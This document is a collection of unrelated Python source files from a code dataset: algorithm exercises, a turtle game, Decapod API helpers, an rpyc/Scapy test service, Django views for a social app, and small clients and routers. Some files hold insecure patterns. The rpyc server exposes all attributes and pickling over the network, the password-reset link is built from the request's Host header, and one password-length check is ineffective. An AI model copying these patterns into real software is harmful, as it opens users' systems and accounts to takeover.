file_output.write(line)\n","repo_name":"bonomip/suito-speed-fix","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"13963377014","text":"import copy\nfrom collections import deque\n\nN = int(input())\n\ngraph = [[] for _ in range(N+1)] # 각 번호들의 연결 그래프를 담을 곳\n\n# 진입차수 잡아주기\nindegree = [0] * (N+1)\n\ntime = [0] * (N+1)\n\nfor i in range(1, N+1):\n data = list(map(int, input().split())) # -1로 범위값으로 받아야해서\n time[i] = data[0] #data로 들어온 것 중에 맨 앞에 있는게 현재 강의의 시간값\n\n for x in data[1:-1]:\n indegree[i] += 1\n graph[x].append(i)\n\ndef topology_sort():\n result = copy.deepcopy(time)\n q = deque()\n\n for i in range(1, N+1):\n if indegree[i] == 0:\n q.append(i)\n\n while q:\n now = q.popleft()\n\n for i in graph[now]:\n result[i] = max(result[i], result[now] + time[i])\n indegree[i] -= 1\n\n if indegree[i] == 0:\n q.append(i)\n\n\n for i in range(1, N+1):\n print(result[i])\n\ntopology_sort()\n\n\n\n\n","repo_name":"TannerKi1/Python_Practice","sub_path":"Daily Algorithm/22.08/220812/DBB_303_커리큘럼_위상정렬.py","file_name":"DBB_303_커리큘럼_위상정렬.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16880647040","text":"'''\n1. Random appearance of the shape on different parts of the screen\n2. The event of a shape being clicked\n3. The score updating\n4. The timer updating\n'''\n# a121_catch_a_turtle.py\n#-----import statements-----\nimport turtle as trtl\nimport random as rand\n\n#-----game configuration----\nxMin = 0\nxMax = 112\nyMin = 0\nyMax = 324\nscore = 0\ntimer = 5\n\ntimerup = False\ncounterinterval = 1000\nfontsetup = (\"Arial\", 20, \"normal\")\ncolor = \"blue\"\nshape = \"triangle\"\n\n#-----initialize turtle-----\nt = trtl.Turtle()\nt.shape(shape)\nt.fillcolor(color)\nt.penup()\nt.hideturtle()\n\ngamestart = trtl.Turtle()\ngamestart.penup()\ngamestart.goto(300, -300)\ngamestart.write(\"Press to begin!\", font=fontsetup)\n\nscorewriter = trtl.Turtle()\nscorewriter.penup()\nscorewriter.goto(300, -300)\nscorewriter.hideturtle()\n\ncounter = trtl.Turtle()\ncounter.penup()\ncounter.goto(-300, -300)\ncounter.hideturtle()\n\n#-----game functions--------\ndef spot_clicked(x, y):\n t.goto(rand.randint(xMin, xMax), rand.randint(yMin, yMax))\n scorechange()\n addcolor()\n size()\n\ndef addcolor():\n colorlist = [\"Red\", \"Yellow\", \"Green\", \"Blue\", \"Orange\"]\n t.fillcolor(rand.choice(colorlist))\n t.stamp()\n t.fillcolor(color)\n\ndef size():\n sizechange = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n t.turtlesize(rand.choice(sizechange))\n\ndef scorechange():\n global score\n score += 1\n scorewriter.clear()\n scorewriter.write(score, font=fontsetup)\n\ndef start_game(x, y):\n t.showturtle()\n countdown()\n gamestart.clear()\n\ndef countdown():\n global timer, timerUp\n counter.clear()\n if timer <= 0:\n timer -= 1\n counter.write(\"Time Is Up!\", font=fontsetup)\n timerUp = True\n else:\n counter.write(\"timer: \" + str(timer), font=fontsetup)\n timer -= 1\n counter.getscreen().ontimer(countdown, counterinterval)\n#-----events----------------\ngamestart.onclick(start_game)\nt.onclick(spot_clicked)\n\nwn = trtl.Screen()\nwn.bgcolor(\"purple\")\nwn.mainloop()","repo_name":"mrogers02/1-2-1Activity","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"25851501179","text":"import contextlib\n\nimport flask\n\nfrom decapod_api import auth\nfrom decapod_api import exceptions as http_exceptions\nfrom decapod_common import exceptions as base_exceptions\nfrom decapod_common import log\nfrom decapod_common.models import execution\nfrom decapod_common.models import playbook_configuration\nfrom decapod_common.models import task\n\n\nLOG = log.getLogger(__name__)\n\"\"\"Logger.\"\"\"\n\n\n@contextlib.contextmanager\ndef created_playbook_configuration_model(\n name, playbook_id, cluster_model, servers, initiator_id, hints, *,\n delete_on_fail=False):\n try:\n pcmodel = playbook_configuration.PlaybookConfigurationModel.create(\n name=name,\n playbook_id=playbook_id,\n cluster=cluster_model,\n servers=servers,\n initiator_id=initiator_id,\n hints=hints\n )\n except base_exceptions.UniqueConstraintViolationError as exc:\n LOG.warning(\n \"Cannot create cluster %s (unique constraint \"\n \"violation)\", name)\n raise http_exceptions.ImpossibleToCreateSuchModel() from exc\n except base_exceptions.ClusterMustBeDeployedError as exc:\n mid = cluster_model.model_id\n LOG.warning(\n \"Attempt to create playbook configuration for not \"\n \"deployed cluster %s\", mid)\n raise http_exceptions.ClusterMustBeDeployedError(mid) from exc\n\n LOG.info(\"Playbook configuration %s (%s) created by %s\",\n name, pcmodel.model_id, initiator_id)\n\n try:\n yield pcmodel\n except Exception as exc:\n if delete_on_fail:\n LOG.warning(\"Caught exception %s, delete playbook config %s\",\n exc, pcmodel.model_id)\n pcmodel.delete()\n raise\n\n\n@contextlib.contextmanager\ndef created_execution_model(pcmodel, initiator_id, *, delete_on_fail=True):\n auth.AUTH.check_auth_permission(flask.g.token.user,\n \"playbook\", pcmodel.playbook_id)\n if pcmodel.cluster.time_deleted:\n raise http_exceptions.CannotExecuteOnDeletedCluster(\n pcmodel.cluster_id)\n\n model = execution.ExecutionModel.create(pcmodel, initiator_id)\n LOG.info(\n \"Created execution %s for playbook configuration %s of \"\n \"version %s\",\n model.model_id, pcmodel.model_id, pcmodel.version\n )\n try:\n with created_task(pcmodel, model) as tsk:\n LOG.info(\"Created task for execution %s: %s\",\n model.model_id, tsk._id)\n yield model\n except Exception as exc:\n LOG.error(\"Cannot create task for execution %s: %s\",\n model.model_id, exc)\n if delete_on_fail:\n model.state = execution.ExecutionState.failed\n model.save()\n\n raise\n\n\n@contextlib.contextmanager\ndef created_task(pcmodel, execution_model):\n tsk = task.PlaybookPluginTask(\n pcmodel.playbook_id, pcmodel._id, execution_model.model_id\n )\n tsk.create()\n\n yield tsk\n","repo_name":"Mirantis/ceph-lcm","sub_path":"backend/api/decapod_api/views/v1/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"51"} +{"seq_id":"3908251164","text":"import sys\nimport logging\nimport warnings\nfrom signal import signal, SIGINT\n\nimport rpyc\nfrom rpyc.utils.server import ThreadedServer\nfrom server import ScapyServer\n\nwarnings.filterwarnings(\"ignore\", \"BaseException.message\")\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\ndata = {}\n\n\nclass ScapyService(rpyc.Service, ScapyServer):\n def on_connect(self, conn):\n print(\"connected\")\n conn._config.update(dict(\n allow_all_attrs=True,\n allow_public_attrs=True,\n allow_pickle=True,\n allow_getattr=True,\n allow_setattr=True,\n allow_delattr=True,\n import_custom_exceptions=False,\n propagate_SystemExit_locally=True,\n propagate_KeyboardInterrupt_locally=True,\n instantiate_custom_exceptions=True,\n instantiate_oldstyle_exceptions=True,\n ))\n\n def on_disconnect(self, conn):\n print(\"disconnected\")\n\n\ndef main():\n data[\"scapyServiceObj\"] = ScapyService()\n\n def handler(signal_received, frame):\n # Handle any cleanup here\n scapyServiceObj = data.pop(\"scapyServiceObj\", None)\n if scapyServiceObj:\n del data[\"scapyServiceObj\"]\n print('SIGINT or CTRL-C detected. Exiting gracefully')\n sys.exit(0)\n\n # install packages needed\n # os.system(\"apt-get install -y iputils-arping\")\n # os.system(\"pip install pybrctl\")\n # os.system(\"pip install pyroute2\")\n\n signal(SIGINT, handler)\n protocol_config = {\"allow_pickle\": True, \"sync_request_timeout\": 300, \"allow_public_attrs\": True, \"allow_all_attrs\": True, \"instantiate_oldstyle_exceptions\": True}\n t = ThreadedServer(data[\"scapyServiceObj\"], port=8009, logger=logger, protocol_config=protocol_config, backlog=1)\n t.start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"spytest/spytest/tgen/scapy/rpyc-service.py","file_name":"rpyc-service.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"7674565814","text":"from django.http import HttpResponse, Http404, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.core.files.storage import FileSystemStorage\nfrom django.core.mail import send_mail\nfrom django.utils.crypto import get_random_string\nfrom django.conf import settings\n\nimport os\nimport requests\n\n# Get custom models\nfrom .models import feedback_content, account_settings\n\n# Used to store password recovery urls\nrecovery_url_email = {}\nrecovery_email_url = {}\nrecovery_urls = []\n\n# Create your views here.\ndef handler403(request, *args, **argv):\n return render(request, \"TeekerApp/403.html\", status=403)\n\ndef handler404(request, *args, **argv):\n return render(request, \"TeekerApp/404.html\", status=404)\n\ndef handler500(request, *args, **argv):\n return render(request, \"TeekerApp/500.html\", status=500)\n\n\ndef index(request, search=None):\n \"\"\"Used for Home page\"\"\"\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\")\n\n if request.method == \"GET\":\n if not search:\n search=\"oyrq-qzOx1U\" # If no searches have been made use this as default\n\n try:\n url = f'https://www.googleapis.com/youtube/v3/videos?id={search}&key={settings.GOOGLE_API}&part=status'\n url_get = requests.get(url)\n if url_get.json()[\"items\"][0][\"status\"][\"publicStatsViewable\"]:\n print(\"Video is publicly available\")\n else:\n print(\"Video not publicly available\")\n search=\"oyrq-qzOx1U\" # If no searches have been made use this as default\n except:\n search=\"oyrq-qzOx1U\"\n print(\"Video does not exist.\")\n \n try:\n f = account_settings.objects.get(owner=int(request.user.pk)).profile_picture\n if not f:\n f = \"images/421-4213053_default-avatar-icon-hd-png-download-crop-u29550_2x.jpg?crc=3789372887\"\n except account_settings.DoesNotExist:\n f = \"images/421-4213053_default-avatar-icon-hd-png-download-crop-u29550_2x.jpg?crc=3789372887\"\n\n print(f)\n\n html_content = {\"message\": \"G\",\n \"title\": \"My Morning Vibes\",\n \"username\": \"Megan2020\",\n \"description\": \"The air smells like flowers and the sun shines like gold.\",\n \"average_rating\": 8,\n \"youtube_easteregg\": search,\n \"counter\": [\"1\", \"2\", \"3\"],\n \"profile_img\": f}\n\n return render(request, \"TeekerApp/index.html\", html_content)\n\n\ndef search_bar(request): # For now this is just used as a Alpha Easter Egg\n \"\"\" Displays the profile of other users in a different way compared to when you own the account. \"\"\"\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\")\n\n if request.method == \"POST\":\n\n if request.POST[\"search\"]:\n yt_video = str(request.POST[\"search\"])\n else:\n print(\"Nothing to search...\")\n\n return HttpResponseRedirect(reverse(\"index_search\", args=(yt_video,)))\n\n\ndef get_client_ip(request):\n \"\"\" Used in register for reCAPTCHA verification. This gets the users Public IP address \"\"\"\n x_forwarded_for = request.META.get(\"HTTP_X_FORWARDED_FOR\")\n if x_forwarded_for:\n ip = x_forwarded_for.split(\",\")[0]\n else:\n ip = request.META.get(\"REMOTE_ADDR\")\n return ip\n\ndef register(request):\n \"\"\"Used for sign up/register page\"\"\"\n\n # Make sure the user is sent to the home page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n # Check if the request is POST\n if request.method == \"POST\":\n\n # Get the credentials to use to register the user\n username = str(request.POST[\"username\"])\n first_name = str(request.POST[\"first_name\"])\n last_name = str(request.POST[\"last_name\"])\n e_mail = str(request.POST[\"email\"])\n password = str(request.POST[\"pwd\"])\n passwordconfirm = str(request.POST[\"cpwd\"])\n\t\t\n # Used later for phone number authentication to prevent spam accounts\n # The code to save this to the Database will need to be written later\n #phonenumber = str(request.POST[\"phonenumber\"])\n\n # Check if the check box was ticket that says that the user agrees with the Terms and Conditions\n try:\n request.POST[\"custom_U1133\"]\n except KeyError:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"You didn't agree to the Terms And Conditions!\"})\n\n # Check if the reCAPTCHA was successful (reCAPTCHA v2.0)\n try:\n if not request.POST[\"g-recaptcha-response\"]:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"Failed to check reCAPTCHA.\"})\n else:\n captcha_rs = request.POST[\"g-recaptcha-response\"]\n url = \"https://www.google.com/recaptcha/api/siteverify\"\n params = {\n \"secret\": settings.RECAPTCHA_SECRET_KEY,\n \"response\": captcha_rs,\n \"remoteip\": get_client_ip(request),\n \"success\": True|False,\n \"hostname\": settings.ALLOWED_HOSTS\n }\n verify_rs = requests.get(url, params=params, verify=True)\n verify_rs = verify_rs.json()\n if not verify_rs[\"success\"]:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"reCAPTCHA not valid. Try again in 1 minute.\"})\n except KeyError:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"Failed to check reCAPTCHA.\"})\n\n # Check if the Password matches the requirements\n if len(password) > 7 and len(password) < 65:\n if password != passwordconfirm:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"Passwords don't match!\"})\n else:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"Password too short! Please make it longer then 8 characters and less the 64.\"})\n\n # Iniatialize variable\n result = {}\n\n # Check if the username already exists in the Database\n try:\n User.objects.get(username=username)\n result[\"USERNAME_CHECK\"] = True\n except User.DoesNotExist:\n result[\"USERNAME_CHECK\"] = False\n\n # If the username does exist send a message\n if result[\"USERNAME_CHECK\"]:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"username exists! Please use another one.\"})\n\n # Check if the email already exists in the Database\n try:\n User.objects.get(email=e_mail)\n result[\"EMAIL_CHECK\"] = True\n except User.DoesNotExist:\n result[\"EMAIL_CHECK\"] = False\n \n # If the username does exist send a message\n if result[\"EMAIL_CHECK\"]:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"email exists! Please use another one.\"})\n \n # If the credentials are valid register the user to the Database\n if not result[\"EMAIL_CHECK\"] and not result[\"USERNAME_CHECK\"]:\n f = User.objects.create_user(username=username,\n email=e_mail,\n first_name=first_name,\n last_name=last_name,\n password=password)\n f.save() # Save the new users details to the Database\n\n account_settings(owner=int(request.user.pk),\n news_letter=False # For now the News letter option will stay Disabled till futher notice\n ).save()\n \n # Send the new user a email\n send_mail(\"Welcome To Teeker\",\n \"\"\"Welcome to Teeker. \n Thank You For Joining our Community, we hope you have fun. \n Don't reply to this email.\"\"\",\n os.getenv(\"EMAIL\"),\n [e_mail],\n fail_silently=False,\n html_message=\"\"\"

    Welcome To Teeker

    \n
    \n Thank You For Joining our Community, have FUN!\n
    \n
    \n Don't reply to this email.\"\"\")\n return HttpResponseRedirect(reverse(\"index\"))\n\n return render(request, \"TeekerApp/register.html\")\n\n\ndef register_validation(request, option):\n \"\"\" Used by the Register page Javascript to check if the user has valid credidentionals \"\"\"\n\n # Check if the username already exists in the Database\n if option == \"username\":\n username = str(request.POST[\"username\"])\n try:\n User.objects.get(username=username)\n return JsonResponse({\"STATUS\": False})\n except User.DoesNotExist:\n return JsonResponse({\"STATUS\": True})\n \n # Check if the email address already exists in the Datavase\n elif option == \"email\":\n email = str(request.POST[\"email\"])\n try:\n User.objects.get(email=email)\n return JsonResponse({\"STATUS\": False})\n except User.DoesNotExist:\n return JsonResponse({\"STATUS\": True})\n\n return JsonResponse({\"STATUS\": True})\n\n\ndef login_page(request):\n \"\"\" Used for Login Page \"\"\"\n\n # Check if the user if still logged in or not\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n if request.method == \"POST\":\n\n # Get the credentials from the input fields\n username = str(request.POST[\"username\"])\n pwd = str(request.POST[\"pwd\"])\n\n # Check if the credentials are valid\n user = authenticate(request, username=username, password=pwd)\n\n # Log the user in if the credentials are valied\n if user:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"TeekerApp/login.html\", {\"message\": \"Invalid username/email or password!\"})\n\n return render(request, \"TeekerApp/login.html\")\n\t\ndef logout_page(request):\n \"\"\" Used for logging out the user \"\"\"\n \n logout(request) # Log out the user from the server\n \n return HttpResponseRedirect(reverse(\"login\"))\n\n\ndef forgot_pwd(request, html_content=None):\n \"\"\" Used for recovering user password \"\"\"\n\n # Make sure the user is sent to the home page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n if request.method == \"POST\":\n\n # Check if the email the user gave exists in the Database\n email = str(request.POST[\"email\"])\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n html_content = {\n \"option\": \"email\",\n \"message\": \"User with that email address does not exist.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n # Store the users credentials in f\n f = User.objects.get(email=email)\n while True:\n\n # Get a random string to make the random URL\n r_url = str(get_random_string(length=32))\n\n # Check if the string doesn't exist in the URL list\n if r_url not in recovery_urls:\n\n # Check if the email address is already waiting\n try:\n if recovery_email_url[email]:\n\n html_content = {\n \"option\": \"email\",\n \"message\": \"Email already sent. If you haven't recieved the email please contact Support. ERx2\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n except KeyError:\n recovery_urls.append(r_url) # Place the random string URL in the list\n recovery_email_url[email] = r_url # Place the random string URL in the dictionary with the key being the email address\n recovery_url_email[r_url] = email # Place the email address in the dictionary with the key being the random string URL\n\n # Send the random string URL to the email address provided by the user\n send_mail(\"Forgot Password\",\n \"\"\"Forgot Your password?\n Use this link: \"\"\"+str(request.META[\"HTTP_HOST\"])+\"/forgot_pwd/\"+r_url,\n os.getenv(\"EMAIL\"),\n [f.email],\n fail_silently=False,\n html_message=\"\"\"

    Forgot Your Password?

    \n

    Use this Link to recover your account:

    \"\"\"+str(request.META[\"HTTP_HOST\"])+\"/forgot_pwd/\"+r_url+\"\"\"\n
    \n Don't reply to this email.\"\"\")\n break # Break the loop\n html_content = {\n \"option\": \"email\",\n \"success_message\": \"Check your inbox now. (If you can't find it check the spam mail)\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n elif request.method == \"GET\":\n if not html_content:\n html_content = {\n \"option\": \"email\",\n \"message\": \"\"\n }\n\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n\ndef forgot_pwd_handler(request, option):\n \"\"\" Used to handle the forgot password URL and password changes \"\"\"\n\n # Make sure the user is sent to the home page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n # Check if the URL in the option variable doesn't exists in the 'recovery_urls' list\n if option not in recovery_urls:\n return HttpResponseRedirect(reverse(\"forgot_pwd\")) # Redirect user to the page where they have to put the email address\n\n html_content = {\n \"option\": \"pwd\",\n \"url\": option\n }\n\n return render(request, \"TeekerApp/forgot_pwd_2.html\", html_content)\n\n\ndef forgot_pwd_change(request, option):\n \"\"\" Used to update the account password to the new one. \"\"\"\n\n # Make sure the user is sent to the home page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n if request.method == \"POST\":\n\n # Collect all data from input fields\n url = str(request.POST[\"ust_url\"])\n pwd = str(request.POST[\"pwd\"])\n cpwd = str(request.POST[\"cpwd\"])\n\n # Check if the reCAPTCHA was successful (reCAPTCHA v2.0)\n try:\n if not request.POST[\"g-recaptcha-response\"]:\n html_content = {\n \"option\": \"email\",\n \"message\": \"Failed to check reCAPTCHA.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n else:\n captcha_rs = request.POST[\"g-recaptcha-response\"]\n url_recaptcha = \"https://www.google.com/recaptcha/api/siteverify\"\n params = {\n \"secret\": settings.RECAPTCHA_SECRET_KEY,\n \"response\": captcha_rs,\n \"remoteip\": get_client_ip(request)\n }\n verify_rs = requests.get(url_recaptcha, params=params, verify=True)\n verify_rs = verify_rs.json()\n if not verify_rs[\"success\"]:\n html_content = {\n \"option\": \"email\",\n \"message\": \"reCAPTCHA not valid. Try again in 1 minute.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n except KeyError:\n html_content = {\n \"option\": \"email\",\n \"message\": \"Failed to check reCAPTCHA.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n # Check if the new password meets requirements\n if len(pwd) > 7 or len(pwd) < 65 and len(cpwd) > 7 or len(cpwd) < 65:\n\n # Check if the new password and confirm password match\n if pwd == cpwd:\n \n if url in recovery_urls:\n email = recovery_url_email[url] # Get the email address related to the url key\n \n # Update the users password\n f = User.objects.get(email=email)\n f.set_password(pwd)\n f.save()\n\n # Remove the URL and email address from the list and dictionary\n try:\n recovery_urls.remove(url)\n del recovery_email_url[email]\n del recovery_url_email[url]\n except KeyError:\n print(\"Failed to remove URL and Email address from Recovery Password.\")\n\n return HttpResponseRedirect(reverse(\"index\")) # Send user to home page\n else:\n html_content = {\n \"option\": \"email\",\n \"message\": \"URL broken!\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n else:\n html_content = {\n \"option\": \"email\",\n \"message\": \"The passwords don't match!\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n else:\n html_content = {\n \"option\": \"email\",\n \"message\": \"Your new password does not meet our requirements.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n else:\n html_content = {\n \"option\": \"email\",\n \"message\": \"Something went wrong.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n return HttpResponseRedirect(reverse(\"forgot_pwd\"))\n \n\ndef account(request):\n \"\"\" Used for account page to display Account information \"\"\"\n \n html_content = {\"\":\"\"}\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\", html_content)\n \n return render(request, \"TeekerApp/account.html\", html_content)\n\n\ndef feedback(request):\n \"\"\" Used for giving feedback. Mostly looking for bug issue reports. \"\"\"\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\")\n\n if request.method == \"POST\":\n\n if request.POST[\"subject\"]:\n subject_v = str(request.POST[\"subject\"])\n\n if request.POST[\"message\"]:\n message_v = str(request.POST[\"message\"])\n\n # Check if the reCAPTCHA was successful (reCAPTCHA v2.0)\n try:\n if not request.POST[\"g-recaptcha-response\"]:\n html_content = {\"alert_message\": \"Failed to check reCAPTCHA.\"}\n else:\n captcha_rs = request.POST[\"g-recaptcha-response\"]\n url_recaptcha = \"https://www.google.com/recaptcha/api/siteverify\"\n params = {\n \"secret\": settings.RECAPTCHA_SECRET_KEY,\n \"response\": captcha_rs,\n \"remoteip\": get_client_ip(request)\n }\n verify_rs = requests.get(url_recaptcha, params=params, verify=True)\n verify_rs = verify_rs.json()\n if not verify_rs[\"success\"]:\n html_content = {\"alert_message\": \"reCAPTCHA not valid. Try again in 1 minute.\"}\n except KeyError:\n html_content = {\"alert_message\": \"Failed to check reCAPTCHA.\"}\n\n feedback_content(owner=int(request.user.pk),\n subject=subject_v,\n feedback=message_v).save()\n \n # Get all FeedBack Data\n p_feedback = feedback_content.objects.all()\n if p_feedback:\n feedback_html_c = []\n for i in p_feedback:\n p_user = User.objects.get(pk=int(i.owner))\n feedback_html_c.append({\n \"username\": p_user.username,\n \"subject\": i.subject,\n \"feedback_message\": i.feedback,\n \"date\": i.date\n })\n\n html_content = {\n \"feedback_html\": feedback_html_c,\n \"success_message\": \"FeedBack has been Received and will be viewed soon! Thank You.\"\n }\n else:\n html_content = {\"success_message\": \"FeedBack has been Received and will be viewed soon! Thank You.\"}\n\n return render(request, \"TeekerApp/feedback.html\", html_content)\n else:\n html_content = {\"alert_message\": \"FeedBack Message missing!\"}\n return render(request, \"TeekerApp/feedback.html\", html_content)\n else:\n html_content = {\"alert_message\": \"Subject is missing!\"}\n return render(request, \"TeekerApp/feedback.html\", html_content)\n\n elif request.method == \"GET\":\n\n # Get all FeedBack Data\n p_feedback = feedback_content.objects.all()\n if p_feedback:\n feedback_html_c = []\n for i in p_feedback:\n p_user = User.objects.get(pk=int(i.owner))\n feedback_html_c.append({\n \"username\": p_user.username,\n \"subject\": i.subject,\n \"feedback_message\": i.feedback,\n \"date\": i.date\n })\n\n html_content = {\n \"feedback_html\": feedback_html_c\n }\n else:\n html_content = {\"\":\"\"}\n\n return render(request, \"TeekerApp/feedback.html\", html_content)\n\n\ndef settings_page(request):\n \"\"\" Used to show the users account settings and allow them to modify them. \"\"\"\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\")\n\n try:\n f = account_settings.objects.get(owner=int(request.user.pk))\n if f:\n html_content = {\n \"news_letter\": f.news_letter,\n \"inbox_notifications\": f.inbox_notifications,\n \"browser_notifications\": f.browser_notifications\n }\n except account_settings.DoesNotExist:\n html_content = {\n \"news_letter\": False,\n \"inbox_notifications\": False,\n \"browser_notifications\": False\n }\n\n # I don't know if this should be here or not (This might be removed in the future)\n account_settings(owner=int(request.user.pk),\n news_letter=False # For now the News letter option will stay Disabled till futher notice\n ).save()\n\n return render(request, \"TeekerApp/settings.html\", html_content)\n\n\ndef inbox(request):\n \"\"\" Shows the messages the user has recieved from other users. A little communication page. \"\"\"\n\n html_content = {\"\":\"\"}\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\", html_content)\n\n return render(request, \"TeekerApp/inbox.html\", html_content)\n\n\ndef subscriptions(request):\n \"\"\" Shows the content of the user's the user is following. \"\"\"\n\n html_content = {\"\":\"\"}\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\", html_content)\n\n return render(request, \"TeekerApp/subscriptions.html\", html_content)\n\n\ndef upload_post(request):\n \"\"\" Used to upload the users content to our database and server. \"\"\"\n\n html_content = {\"\":\"\"}\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\", html_content)\n\n return render(request, \"TeekerApp/upload_post.html\", html_content)\n\n\ndef visitor_account_view(request):\n \"\"\" Displays the profile of other users in a different way compared to when you own the account. \"\"\"\n\n html_content = {\"\":\"\"}\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\", html_content)\n\n return render(request, \"TeekerApp/visitor_account_view.html\", html_content)\n\n ","repo_name":"TeekerApp/Teeker","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"72564733919","text":"import socket \n\ndef client():\n try:\n cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"[C]: Client socket created\")\n except socket.error as err:\n print('socket open error: {} \\n'.format(err))\n exit()\n \n # Define the port on which you want to connect to the server\n port = 50007\n localhost_addr = socket.gethostbyname(socket.gethostname())\n\n # connect to the server on local machine\n server_binding = (localhost_addr, port)\n cs.connect(server_binding)\n\n # Receive data from the server\n\n # data_from_server=cs.recv(100)\n # print(\"[C]: Data received from server: {}\".format(data_from_server.decode('utf-8'))\n readFilePtr = open(\"in-proj.txt\", \"r\")\n writeFilePtr = open(\"output.txt\", \"w\")\n count = 0; \n for line in readFilePtr:\n cs.send(line.encode('utf-8'))\n data_from_server = cs.recv(300)\n data_from_server = data_from_server.decode('utf-8')\n writeFilePtr.write(data_from_server + \"\\n\")\n writeFilePtr.close()\n\n # close the client socket\n cs.close()\n exit()","repo_name":"omshah0111/Socket-Programming-","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23500470772","text":"from typing import List\n\nfrom fastapi import APIRouter, Depends\n\nfrom src.schemas import UserRequestSchema, UserResponseSchema\n\nfrom src.database.queries import get_user_query, create_user_query, get_all_users\n\n\nuser_router = APIRouter(prefix=\"\", tags=[\"register\"])\n\n\n@user_router.post(\n \"/register\",\n summary=\"Регистрация пользователей\",\n status_code=201\n)\nasync def register(user: UserRequestSchema = Depends(create_user_query)):# -> UserResponseSchema:\n res = await create_user_query(user)\n return res\n\n\n@user_router.get(\n \"/users\",\n summary=\"Получить всех пользователей\"\n)\nasync def get_users() -> List[UserResponseSchema]:\n user_list = await get_all_users()\n return user_list\n","repo_name":"denisakhmetovdev/AuthService","sub_path":"src/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36955371905","text":"from unittest import TestCase\nimport pandas as pd\nimport pytest\n\nfrom landbosse.model import SubstationCost\n\n\nclass TestSubstationCost(TestCase):\n\n def setUp(self):\n self.input_dict = dict()\n self.input_dict['interconnect_voltage_kV'] = 1\n self.input_dict['project_size_megawatts'] = 1\n self.project_name = 'Project_1'\n self.output_dict = dict()\n\n # self.input_dict['turbine_rating_MW'] = 1.5\n # self.input_dict['num_turbines'] = 15\n # self.input_dict['project_size_megawatts'] = self.input_dict[\n # 'num_turbines'] * self.input_dict['turbine_rating_MW'] # MW\n # self.input_dict['rotor_diameter_m'] = 75\n\n def test_SubstationCostModule(self):\n \"\"\"\n Black box test to check whether module is ran successfully or not\n \"\"\"\n run_SubstationCost = 